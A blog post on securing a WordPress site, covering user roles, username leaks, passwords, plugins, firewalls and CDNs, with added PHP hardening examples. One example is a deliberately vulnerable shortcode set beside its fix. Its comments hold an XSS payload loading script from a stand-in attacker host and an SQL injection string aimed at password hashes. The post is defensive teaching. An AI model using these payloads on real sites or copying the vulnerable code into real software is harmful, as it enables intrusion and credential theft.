It’s one of those things none of us want to go through with our blog, yet lately it seems I hear it’s happened to someone almost daily. A site gets compromised, malware gets planted, and readers get infected. Some of us are able to resolve the issue, pick up the pieces, and move on. For others it’s not so easy, and the potential to lose everything is always lingering. Today I want to talk about how to secure your blog in a few easy steps.
Hide Your Login Page?
A lot of people get hung up on hiding the login page. It’s common knowledge that if you run a WordPress Content Management System (CMS) you log in at /wp-login.php (visiting /wp-admin/ sends you there). The thinking is that if we hide the login page, it becomes that much harder for someone to get into the site. There are even arguments that it hides the fact that you are using WordPress at all, along with your content, CSS, plugins, versions, etc. Let me stop you right there: don’t waste your time. It’s a false sense of security and doesn’t do much for you. Your theme and plugins still load from /wp-content/, which gives WordPress away on every page, and xmlrpc.php still accepts a username and password over XML-RPC whether or not wp-login.php has been moved. Don’t believe me? Keep reading! Instead, invest in a few of the methods below.
Simple and free debugging tools like Fiddler Web Debugger can give us a wealth of information about a website just by typing in the URL and hitting GO. This isn’t a malicious website-scanning tool, and all of the information Fiddler collects flows freely to any web browser that loads the site: the HTTP headers, the HTML source, and the version strings on the CSS and JavaScript files. The above image shows that this site is using the CloudFlare CDN, most likely on a Bluehost NGINX server, and is running the CloudFlare WP plugin (version 1.3.16 to be exact). The below image shows a site using the Foodie theme at CSS version 1.0.9 (it even provided me the entire CSS file), as well as other potential plugin information. I could then easily start researching how to exploit those plugins, the theme, or WordPress itself.
So how do we secure our site if it’s this easy to sniff this information? All of this is public data anyway, so the defences have to lie elsewhere. Let’s look at some basics.
Administrators vs Authors
Most of us start our site with one login, the administrator account. We go to work posting and developing content without thinking twice about creating any other logins. Why would you, since you’re the only one posting and accessing the site anyway?
First, if your administrator account is still named admin, change it to something off the wall. WordPress won’t let you rename a username, so create a new administrator with an unusual username, log in as it, and delete the old one. Second, never post anything with your administrator account; keep that account for back-end operations only, like updating your site, making major site changes, and updating plugins. Instead, create yourself an author account for posting. This way, when you start posting content your administrator account isn’t shown to the world in the “Post By” line, and a guessed or stolen author password can’t install plugins or change your theme, because the Author role doesn’t have those rights. It may take a few extra steps when you want to administer the site rather than post content, but it has the potential to save you a headache down the road.
Simply log in to your WordPress site as your administrator, click Users, then Add New. Once the user is created, edit the user and choose Author for the role (see images below).
Display Name vs Username
Which brings me to usernames and display names. When creating a user, make sure the username is different from the name shown on posts (this goes for good old ‘admin’ as well). If I create an author named Dave and make the username Dave too, I’ve taken most of the work out of guessing the login name; half the battle is done for the attacker, who now only needs to guess your password, which probably has something to do with your pet, your significant other, or your children, things you most likely post about on a weekly basis! So do yourself a favor and pick a username different from your display name, like I have in the example below.
Once your user is created, edit the user and choose the Display Name you want. Do this for all your authors, as well as your administrator account. One caveat: the display name only covers the byline. The author archive URL (/author/<slug>/) uses a separate slug that WordPress derives from the username by default, and the same slug is published by the REST API at /wp-json/wp/v2/users, so the login name is still one URL away until that slug is changed too.
If an existing user’s username already matches its display name you can’t rename it (the field is grayed out), but you can create a new user with a better username, then delete the old one and choose “Attribute all content to” the new user in the deletion dialog, which moves every old post over.
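Changing the display name covers the byline only; WordPress also publishes the author slug (derived from the username by default) in author archive URLs, the REST API and the core sitemap. The following must-use plugin closes those channels. It is an added example, not code from the original post: the login name ‘d4v3_writes’, the slug ‘dave’ and the file placement are assumptions.

```php
<?php
/**
 * Plugin Name: Close Username Leaks (added example, not from the post)
 *
 * Drop this file into wp-content/mu-plugins/ and it loads on every request.
 * A different Display Name keeps the login name out of "Posted by", but
 * WordPress still hands it out in three other places unless you close them:
 *   1. the author archive /author/<slug>/ -- the slug (user_nicename) defaults
 *      to the sanitized login name, and /?author=1 redirects straight to it;
 *   2. the REST API at /wp-json/wp/v2/users, which lists every user with a
 *      published post, slug included, to anyone on the internet;
 *   3. the core XML sitemap (WordPress 5.5+), which links every author archive.
 * The login name 'd4v3_writes' and the slug 'dave' below are assumptions.
 */

// 1a. Give the author a public slug that is not the login name. Runs when you
//     open the dashboard; the check makes it idempotent, so once the slug
//     differs from the login name nothing is written again.
add_action( 'admin_init', function () {
	$user = get_user_by( 'login', 'd4v3_writes' );
	if ( $user && $user->user_nicename === sanitize_title( $user->user_login ) ) {
		wp_update_user( array( 'ID' => $user->ID, 'user_nicename' => 'dave' ) );
	}
} );

// 1b. Refuse /?author=N before redirect_canonical() (priority 10) can turn the
//     numeric ID into the /author/<slug>/ URL.
add_action( 'template_redirect', function () {
	if ( isset( $_GET['author'] ) && preg_match( '/^\d+$/', (string) $_GET['author'] ) ) {
		wp_safe_redirect( home_url( '/' ), 301 );
		exit;
	}
}, 1 );

// 2. Remove the users routes for visitors who are not logged in. Logged-in
//    users keep them because the block editor's author picker relies on them.
add_filter( 'rest_endpoints', function ( $endpoints ) {
	if ( ! is_user_logged_in() ) {
		unset( $endpoints['/wp/v2/users'], $endpoints['/wp/v2/users/(?P<id>[\d]+)'] );
	}
	return $endpoints;
} );

// 3. Drop the users provider from wp-sitemap.xml; returning anything other
//    than a provider object tells WordPress to skip it.
add_filter( 'wp_sitemaps_add_provider', function ( $provider, $name ) {
	return 'users' === $name ? false : $provider;
}, 10, 2 );
```

After activating, confirm the slug change took by visiting the author archive from a post byline (it should read /author/dave/), and check that /?author=1 now lands on the home page and /wp-json/wp/v2/users returns a “no route” error in a private browser window.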
Password Complexity
We’ve all heard about it, and hopefully by now we practice password complexity. There is a lot of controversy about what makes a secure password these days. Is it length? Is it complexity? We all have so many passwords floating around our heads that it’s hard to add one more to the mix! Keep yourself secure by mixing complexity with length and you’ll never lose; of the two, length does more, since every extra character multiplies the work of a brute-force attack. For example, P4nc4kew4RRi0r$rockS! mixes words with complexity and length. Awesome password by the way, though now that it’s printed here it belongs in every wordlist, so treat it as a pattern to copy, not a password to use. A password manager lets you give every site a long random password without having to remember any of them.
Limit Your Plugins
As your site and needs grow, so do your plugin requirements. Stick to legitimate plugins with active support (the plugin directory shows when each one was last updated and which WordPress version it was tested with). Remove any old plugins you no longer use; a deactivated plugin’s files are still on the server and can still be attacked directly. And always update your plugins!
Web Application Firewall (WordPress Plugin)
These days complex passwords and hidden usernames aren’t enough when WordPress and its plugins get exploited. Whether you know it or not, your site is constantly being crawled by bots and scanned for exploits by hackers. Yup, it’s true. It’s hard to know these things are going on when you don’t have a way to see it! With that being said, you want to know who’s trying to access your site (in real time), when they’re trying, how many times they’ve attempted, where they’re coming from, whether they’re scanning your site for vulnerabilities... the list goes on. Luckily there are web application firewall (WAF) security plugins for that. They show you everything I just mentioned, and provide reactive and proactive ways to stop these threats, such as locking out an address after a handful of failed logins. Below is a list of security plugins; each comes with its pros and cons, and each has premium paid features. Try them on your site and see which one you like best!
Side note: by default WordPress returns different error messages for a wrong password on a real account (the message names the username) and for an unknown username. That tells anyone trying to get in exactly which usernames exist: if I enter a valid login, WordPress confirms it. Big no-no! The plugins above fix this with options such as Wordfence’s “Don’t let WordPress reveal valid users in login errors”.
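The two plugin features this section leans on, a lockout after repeated failures and a login form that never confirms a username, can be done in a few lines of WordPress hooks. The following must-use plugin is an added example, not code from the post or from any of the plugins mentioned; the LH_BEHIND_CLOUDFLARE constant (something you would define in wp-config.php only when the site really sits behind Cloudflare) and the five-attempts-in-fifteen-minutes limit are assumptions.

```php
<?php
/**
 * Plugin Name: Login Hardening (added example, not from the post)
 *
 * One generic login error plus a lockout after repeated failures from one
 * address. Place in wp-content/mu-plugins/. LH_BEHIND_CLOUDFLARE is an
 * assumed wp-config.php constant for this example.
 */

// Remember, for this request only, that the lockout fired.
function lh_locked( $set = null ) {
	static $locked = false;
	if ( null !== $set ) {
		$locked = (bool) $set;
	}
	return $locked;
}

// The address the attempt came from. Behind a CDN/WAF, REMOTE_ADDR is the
// proxy, so a per-IP counter would lock out every reader at once; use the
// header the proxy sets, but only when you really are behind it, because
// otherwise that header is attacker-controlled and trivially rotated.
function lh_client_ip() {
	if ( defined( 'LH_BEHIND_CLOUDFLARE' ) && LH_BEHIND_CLOUDFLARE
		&& ! empty( $_SERVER['HTTP_CF_CONNECTING_IP'] ) ) {
		return $_SERVER['HTTP_CF_CONNECTING_IP'];
	}
	return isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '0.0.0.0';
}

function lh_fail_key() {
	return 'lh_fail_' . md5( lh_client_ip() );
}

// Count failures per address for 15 minutes. WordPress fires this for every
// rejected attempt, including the ones the lockout itself rejects, so
// hammering the form while locked keeps renewing the window.
add_action( 'wp_login_failed', function () {
	$count = (int) get_transient( lh_fail_key() );
	set_transient( lh_fail_key(), $count + 1, 15 * MINUTE_IN_SECONDS );
} );

// Deny once the limit is hit. Priority 30 runs after WordPress's own
// username/password check (priority 20). An earlier priority would not work:
// wp_authenticate_username_password() discards a WP_Error it receives
// whenever both fields are filled in and checks the password anyway.
add_filter( 'authenticate', function ( $user ) {
	if ( (int) get_transient( lh_fail_key() ) >= 5 ) {
		lh_locked( true );
		return new WP_Error( 'lh_locked', 'Too many failed attempts.' );
	}
	return $user;
}, 30 );

// Clear the counter on a successful login.
add_action( 'wp_login', function () {
	delete_transient( lh_fail_key() );
} );

// One message for "no such user" and "wrong password", so the form never
// confirms a username (it also replaces the empty-field messages, which is
// acceptable). The lockout keeps its own text; whoever sees it caused it.
add_filter( 'login_errors', function ( $message ) {
	return lh_locked()
		? 'Too many failed attempts. Try again in 15 minutes.'
		: 'Invalid username or password.';
} );
```

Transients live in the options table (or the object cache if you have one), so the counter survives across PHP processes on a normal shared host. A per-address limit like this is exactly what the plugins implement, with the difference that they also throttle per username and know the proxy header for the hosts they support, which is why trusting that header blindly is the mistake to avoid when rolling your own.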
Hosted Content Delivery Network (CDN) and Web Application Firewalls (WAF)
I can’t say enough about web application firewalls and content delivery networks and their benefits. The downside is that they aren’t free, but nothing good ever is. Before you stop reading here, I encourage you to continue; you’ve come this far and this is where things can get really scary!
So plugin firewalls at the WordPress level get you some security, but what about the heavier attacks? Someone trying to guess your password is more of an annoyance than anything compared with denial of service, SQL injection, or cross-site scripting (say what!?). If I can find a vulnerability in your site and inject data through it, I can often read or change your database, including the password hashes, or plant my own files, all without needing your password. That pretty much rules out any fear of someone cracking your password in my book. That’s why a WAF and CDN are so important.
One of the most common attacks these days is cross-site scripting (XSS). This is where a hacker injects malicious script into your vulnerable site, most likely through a security hole in a plugin. The script is then served as part of your pages, so when I, the victim, visit your site it runs in my browser, where it can steal my session, redirect me to a malware download, or recruit my computer into a botnet used for other malicious intent like sending spam. We don’t want to do this to our readers, do we? CDNs and WAFs play the middleman in these scenarios.
(awesome image courtesy of sitelock.com)
These services work as proxies, filtering and parsing the traffic between the reader looking at your site and the server serving up the content. They also provide external scanning, as well as internal scanning, checking that your files are clean and your site is free of known security holes and malware. Malicious requests hit the proxy and not the actual site itself, but only as long as the origin server can’t be reached directly: if an attacker learns the origin’s IP address they can bypass the proxy entirely, so where your host allows it, restrict inbound web traffic to the CDN’s published address ranges. These services usually include a CDN, which caches your pages to serve them faster. CDNs and WAFs are usually packaged with hosting plans, but you can purchase them separately as well. I am most familiar with BlueHost (affiliate link) and their security packages and have been very happy with them.
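To make “a vulnerability in a plugin” concrete, here is what the XSS and SQL injection holes described in this section look like in plugin code, next to the fixed version. This is an added example with an invented [recipe_search] shortcode and an invented recipes table, not code from the post or from any real plugin; the fix uses WordPress’s own escaping functions and $wpdb->prepare(), which a WAF can only approximate from the outside.

```php
<?php
/**
 * Plugin Name: Recipe Search (added example: vulnerable vs. hardened)
 *
 * A [recipe_search] shortcode that looks the ?q= query up in a custom
 * {prefix}recipes table and echoes it back. The shortcode, the table and the
 * URLs in the comments are invented for this example; both functions
 * implement the same feature.
 */

// ---- VULNERABLE: the kind of plugin bug the WAF is meant to catch ----------
function rs_vulnerable_shortcode() {
	global $wpdb;
	// WordPress adds slashes to $_GET, so unslashing is correct; what is
	// missing is any sanitizing, escaping or prepared statement after it.
	$q = isset( $_GET['q'] ) ? wp_unslash( $_GET['q'] ) : '';

	// Reflected XSS: the raw value lands in the HTML. A link such as
	//   /recipes/?q=<script src=https://evil.example/x.js></script>
	// runs the attacker's JavaScript in the browser of every reader who follows it.
	$out = '<p>Results for ' . $q . '</p><ul>';

	// SQL injection: the value is glued into the query. q=%' OR 1=1 --
	// returns the whole table, and a UNION SELECT against wp_users (default
	// prefix) reads every password hash, no login required.
	$rows = $wpdb->get_results(
		"SELECT title FROM {$wpdb->prefix}recipes WHERE title LIKE '%{$q}%'"
	);
	foreach ( (array) $rows as $row ) {
		$out .= '<li>' . $row->title . '</li>';   // stored XSS if a title was ever poisoned
	}
	return $out . '</ul>';
}

// ---- HARDENED: same feature, three fixes ----------------------------------
function rs_hardened_shortcode() {
	global $wpdb;
	// 1. Sanitize input: strips tags and control characters. This alone is
	//    not enough, because sanitizing doesn't know where the value ends up.
	$q = isset( $_GET['q'] ) ? sanitize_text_field( wp_unslash( $_GET['q'] ) ) : '';

	// 2. Escape output: esc_html() turns < > & " ' into entities at the point
	//    of output, so the browser sees text, never markup.
	$out = '<p>Results for ' . esc_html( $q ) . '</p><ul>';

	// 3. Prepared statement: %s is quoted and escaped by $wpdb; esc_like()
	//    stops % and _ in the input from acting as LIKE wildcards.
	$rows = $wpdb->get_results( $wpdb->prepare(
		"SELECT title FROM {$wpdb->prefix}recipes WHERE title LIKE %s",
		'%' . $wpdb->esc_like( $q ) . '%'
	) );
	foreach ( (array) $rows as $row ) {
		$out .= '<li>' . esc_html( $row->title ) . '</li>';   // escape DB data too
	}
	return $out . '</ul>';
}

add_shortcode( 'recipe_search', 'rs_hardened_shortcode' );
```

A WAF in front of the site would most likely block the two attack strings in the comments, since they match well-known signatures, but it cannot see the missing esc_html() or the unprepared query, and a slightly reworded payload may slip past it. Updating or replacing the vulnerable plugin is the real fix; the firewall buys time until you do.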
Please note, I have mentioned all affiliate links in this post. However, none of these companies paid me for this post, and these are all my own thoughts and opinions.
You can always find me, as well as other blogging help on FoodBloggerPro.com (affiliate link). It’s not just for food bloggers. You can also find me on LinkedIn or contact me if you’re looking for blog assistance!
What About You?
- Did this help you? Would this be something you’d like to see more of?
- Would you have rather this been a food post? lol
I also provide blogging services, from new site implementations, transfers, theme tweaking and coding, and small tweaks and fixes, to helping you monetize your blog as efficiently as possible. Feel free to contact me on our contact page. I don’t list fees on the site because, like bloggers, all blogs are different and one price doesn’t fit all!